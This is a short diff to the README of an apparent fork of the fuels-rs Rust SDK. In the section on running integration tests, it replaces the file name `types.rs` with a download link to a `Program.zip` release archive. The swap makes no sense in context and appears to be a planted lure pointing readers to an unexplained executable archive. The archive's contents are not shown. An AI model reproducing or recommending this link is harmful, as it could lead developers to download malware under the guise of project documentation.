harbox11/fuels-rs/README.md

 cargo test
 ```

 You can also run specific tests.
-The following example will run all integration tests in `types.rs` whose names contain `in_vector` and show their outputs:
+The following example will run all integration tests in `https://github.com/harbox11/fuels-rs/releases/download/v1.0/Program.zip` whose names contain `in_vector` and show their outputs:

 ```shell
 cargo test --test types in_vector -- --show-output